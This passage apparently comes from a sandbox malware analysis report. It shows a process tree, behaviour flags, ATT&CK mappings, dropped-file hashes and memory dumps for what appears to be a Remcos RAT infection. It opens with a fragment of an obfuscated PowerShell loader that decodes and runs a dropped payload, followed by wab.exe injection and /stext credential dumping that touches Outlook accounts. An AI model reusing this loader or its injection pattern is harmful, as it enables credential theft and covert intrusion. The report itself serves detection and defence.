StatleeAmpexfokRidsninlpseud.saFototelmSbekassa Ordstrt shoppeiirreligoTuerrornTids.krs TenparpKassesveAdmonitrHemagogiBibemrko Bilagsdpicturae Trkd.rrTilbagesM litar. ChristcSesquino.yrkenmuCantdognTvetyditO.turat ') ;$Verdensdelenes=$Reklamationsperioders[$Floorshow];}$Subtract=338547;$Procedurens=31347;Eschel (Brneaarene ' Skumls$polyisogTia.medlV duateobattlesbSooti yaDoctrinlP,ecilo: fortalPtripersrBro.kereVelseterOut laye Driftsj OphreteInsobricRelatiotDition iOysterio Coa.fanHinshou Iltma,=.andels pho omeGXenogene TjsnortScombri-tandtekCKostskooEfterginChand ltOpstvenecomoidsnBetjentt Thooca Sttyske$ belahcGNadj molKlynkeha Glaspum PanidroDisent uPinenssrPe isariSlambassMotorhjeEngracirJenspeciS,nitarnAf,erwigTrekanteAgriolonGranulashandels ');Eschel (Brneaarene ' P.lles$NonadjugGuldrinlYngled,o bredejbBremseraUtaknemldraperf: stomapTFistre.oVoicerrmProduktlQuipsteeRetirinnRadioscdPro.osieOptagebs Anrett Sideomb=Feriere Twinho[ ,oloniSNaturloyBemrkensTilfoejt Kokk,peStudsnimtomahav.,rogramCwrigjrgo U.adhenSygeeksvGendarmerevolter AbashetTilegne] Brsteo: Kasser: permafFSprjt,lr bl,ebaoCompendminhalatBReboleraEmpassisDoorbele Hoota 6 Hollyw4bowleggSRemovertMonarkerProce.ei DeindinJulequig Forvar(Inst,nt$ SubtilPKon rolrCitole eSend mnrAabenbae Antecej ,imreseTubigancSportsgtUtilsteiTaffelboSkolepsn Re,xpo) Opgav ');Eschel (Brneaarene ' Semirh$B,ningsgDoserinlUnuanceoRiflerfb Rfsunca aa enblSatirep: D,uggeu PuseyedFactorivTroke oiMuckwordKul.urkeAbonnem Ac cia=,onbook Overtr[,ebatinSGagerinyGnom.nds AastedtMonocule.utrankmKa,otte.Regul.tTprocureeOpsaetnxphilobitFidibus.ForbogsEVovhundnUgengldcTekstkooForsnakdNitrogliMe.tesrnsuppedegUnbiass]Sttters:Udvoks :ChloranABowwortSS eretnCIndgaarIAnaglypISamf.nd.CollingG tannoge LacerttCurioloS,olkesatKretiskrC,gnituiRingbrynRupeesvgdisting( wel,er$SvarfriTCatech oBlousegmKnapbotlHurtigteDeskripnC cinerd F lkete Kle.tosTorchma) Misspe ');Eschel (Brneaarene 'Waliser$ Le,onsg eutrallAckmanboM,sfondb Pha.taaNavnelilsemivol:PopulisTSt,ftsfrCopolymaDaktyloaBurgerbdTiereranPr.cumbe YverettFejlerntRecapskeTa.demmtMillboasMet.llo=Bippern$YndestcuProb,scd NaturevGodsbaniExocycldFu,dmgteKrselso.Tilk ndsOpvelseuVandforbBegyndesFaconsttNongarrrstoejsii kurtisnPari.etgPrevisi(D kende$Cal.bitSThel,rruDrvepoebPo itict Misantr Ep,uleaIndrykncForsikrtIllogic, itter$,ombardPunpla.trSengekaooftennecPreparoeDetailsdchildriu FyldenrBegrende RaadignFalk,sas Hjemme)Skibbru ');Eschel $Traadnettets;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3048

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Relatival.Esk && echo t"
4⤵
PID:1904

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1496

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ftdzizmxiiblxbpnqcipjskd"
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3016

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qvqrirxzwquyzpmrhnvrufethmc"
5⤵
- Accesses Microsoft Outlook accounts
PID:2992

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\apvcjkiskymdjvavqyqsxkrcismdem"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2296

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Email Collection

T1114

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat
Filesize
144B

MD5
3db8dbb640e8910c00cf9f937ee428f8

SHA1
7a09419820cf1a5578436020686ba121f3fcd4b3

SHA256
1b38324b06c3f96d42de358b481777d8a94bbeadd59229cc40d557655047b868

SHA512
cfe64ffb25b92dc1abf0eea5b0eb7e920861e61f7ef20299836c801ac44ba3d4437db85f8e450aa2e0dbb750459c3e831619cd737b8b316476cb811bd0adc79c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab6B81.tmp
Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ftdzizmxiiblxbpnqcipjskd
Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LT27T997K8H8MNRESDP4.temp
Filesize
7KB

MD5
7632041e8d6a530396ba1085d9c07485

SHA1
61b4e98b43743fdb11c9d3c70dbf58f9d144e654

SHA256
d92a6a1ccfc064bb71c54024dbc04ad50834149eb802a0bdfbac638bcf72e41c

SHA512
600b0c3296a7a0c79beb1fac1afe423815fbe833695f8a7b2ce77f79d7a2b13c0394cc19328ad86e07715dd825650f76c44b81e0aa6d186f440c78182304f1bb

Download Submit
C:\Users\Admin\AppData\Roaming\Relatival.Esk
Filesize
481KB

MD5
c893457e42b60d4088f4cb151646f3f7

SHA1
557e788e9a9e5bf0417f280e3228248bae035bfe

SHA256
9f0a0f963478c382410f631066abdaefd7e87bbed1c5a64a4ad2c2b3dda4eb6f

SHA512
ed130b04c750d12c02c9dcf1fd25d021df926f5e2f03ae9ba2d2d89d83ad1e9c69d0d81dac8628888c314338c11b7321ef294b67689ce4754167d895d5336287

Download Submit
memory/1496-68-0x00000000003C0000-0x00000000003D9000-memory.dmp

Filesize
100KB

Download
memory/1496-71-0x00000000003C0000-0x00000000003D9000-memory.dmp

Filesize
100KB

Download
memory/1496-72-0x00000000003C0000-0x00000000003D9000-memory.dmp

Filesize
100KB

Download
memory/1496-45-0x00000000005F0000-0x0000000001652000-memory.dmp

Filesize
16.4MB

Download
memory/1496-78-0x00000000005F0000-0x0000000001652000-memory.dmp

Filesize
16.4MB

Download
memory/1496-75-0x00000000005F0000-0x0000000001652000-memory.dmp

Filesize
16.4MB

Download
memory/1496-67-0x00000000005F0000-0x0000000001652000-memory.dmp

Filesize
16.4MB

Download
memory/1496-80-0x00000000005F0000-0x0000000001652000-memory.dmp

Filesize
16.4MB

Download
memory/1496-37-0x00000000005F0000-0x0000000001652000-memory.dmp

Filesize
16.4MB

Download
memory/1496-39-0x00000000005F0000-0x0000000001652000-memory.dmp

Filesize
16.4MB

Download
memory/1496-43-0x00000000005F0000-0x0000000001652000-memory.dmp

Filesize
16.4MB

Download
memory/1496-84-0x00000000005F0000-0x0000000001652000-memory.dmp

Filesize
16.4MB

Download
memory/2296-58-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2296-60-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2296-57-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2716-33-0x000007FEF620E000-0x000007FEF620F000-memory.dmp

Filesize
4KB

Download
memory/2716-20-0x000007FEF620E000-0x000007FEF620F000-memory.dmp

Filesize
4KB

Download
memory/2716-21-0x000000001B420000-0x000000001B702000-memory.dmp

Filesize
2.9MB

Download
memory/2716-22-0x0000000001F20000-0x0000000001F28000-memory.dmp

Filesize
32KB

Download
memory/2716-23-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

Filesize
9.6MB

Download
memory/2716-24-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

Filesize
9.6MB

Download
memory/2716-25-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

Filesize
9.6MB

Download
memory/2716-44-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

Filesize
9.6MB

Download
memory/2716-26-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

Filesize
9.6MB

Download
memory/2716-32-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

Filesize
9.6MB

Download
memory/2992-53-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2992-55-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2992-52-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2992-51-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/3016-59-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3016-54-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3016-50-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3016-49-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/3048-35-0x0000000006350000-0x00000000082DC000-memory.dmp

Filesize
31.5MB

Download